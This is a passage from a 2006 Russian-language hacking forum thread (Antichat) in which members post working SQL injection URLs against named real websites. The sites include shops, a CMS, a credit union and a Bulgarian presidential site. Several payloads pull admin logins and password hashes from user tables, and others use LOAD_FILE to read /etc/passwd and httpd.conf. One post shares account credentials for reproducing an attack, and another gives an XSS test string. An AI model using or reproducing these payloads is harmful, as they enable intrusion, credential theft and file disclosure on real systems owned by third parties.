ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 09.10.2006, 21:23
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

Цитата:
Сообщение от _Pantera_  
http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14/*
http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,concat(user,% 22:%22,password),10,11,12,13,14+from+mysql.user/*

А вот и рут нашелся

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14+from+mysql.user/*

Последний раз редактировалось Goudini; 09.10.2006 в 21:30.. Причина: LOAD_FILE('/etc/passwd')
 
Ответить с цитированием

  #62  
Старый 10.10.2006, 16:23
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Ну у меня не банк, конечно...но всё же...
Код:
_http://www.softinka.net/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
(Чтобы увидеть действие скуля, надо быть зарегенным на сайте. чтобы вам полдня не копаться с регистрацией: SponSor:hacker)
/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms _users%20where%20level=5

Последний раз редактировалось Dr.Check; 11.10.2006 в 09:33..
 
Ответить с цитированием

  #63  
Старый 10.10.2006, 21:36
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Цитата:
Сообщение от pop_korn  
какая то хрень с кавычками
_http://www.galicianet.com/foros/default2.asp?IDMensaje=5701+UNION+ALL+SELECT+1,tab le_name,null,null,null,null,null,null,null,null,nu ll+from+information_schema.tables--
http://www.galicianet.com/foros/default2.asp?IDMensaje=1 or 1=(select system_user) --
 
Ответить с цитированием

  #64  
Старый 11.10.2006, 22:44
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

POST: http://shop.shooterscatalog.com/catalog.php?type=category&id=5125 order by 1/*

Скуль на шопе. ORDER BY не врет, но реализация не из элементарных.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием

  #65  
Старый 13.10.2006, 08:29
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

База в виде
email
loginassword



Цитата:
http://www.dramaterapia.cl/dt/index.php?newsgroup=1%20and%201=2%20union%20select %201,email,3,4,5,6,7,concat(uname,char(58),passwd) ,9,10,11,12,13%20from%20admin/*


etc/passwd

Цитата:
http://www.dramaterapia.cl/dt/index.php?newsgroup=1%20and%201=2%20union%20select %201,LOAD_FILE(char(47,101,116,99,47,112,97,115,11 5,119,100)),3,4,5,6,7,8,9,10,11,12,13%20from%20adm in/*


Также в окне поиска пассивная xss

<script>alert()</script>
 
Ответить с цитированием

  #66  
Старый 13.10.2006, 16:34
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Скуля в параметре типа STRING из-за недостаточной фильтрации входящих символов + magic_quotes=Off

http://www.president.bg/news_archive.php?from=news'%20and(1=1)--&type=0
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием

  #67  
Старый 13.10.2006, 21:45
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию

Код:
http://motvet.ru/aboutgame.php?IDNew=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(99,58,92,119,119,119,92,99,111,110,102,92,104,116,116,112,100,46,99,111,110,102)),8,9,10/*
// показывает httpd.conf

_http://www.soccershop.ru/shopping/product_info.php?id=-3016+union+select+1,2,3/*
_http://www.mtas.ru/second.php?ID=-15+union+select+111/*
_http://www.transbuddha.com/mediaHolder.php?id=-1147+union+select+1,2,3,4,5,6,7/*
_http://www.ipecac.com/bio.php?id=-3+union+select+1,2,3,4/*
_http://www.rusfinclub.ru/index.php?news_id=-1846+union+select+1,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #68  
Старый 14.10.2006, 00:10
Аватар для pop_korn
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

_http://www.esparto.co.uk/product.php?id=-454+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
 
Ответить с цитированием

  #69  
Старый 14.10.2006, 11:21
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

_http://www.deseretfirstcu.org/m2m/detail.asp?car=1+UNION+SELECT+1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+login
 
Ответить с цитированием

  #70  
Старый 14.10.2006, 21:26
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

http://tema.in.ua/article/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
http://newstoday.com.ua/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ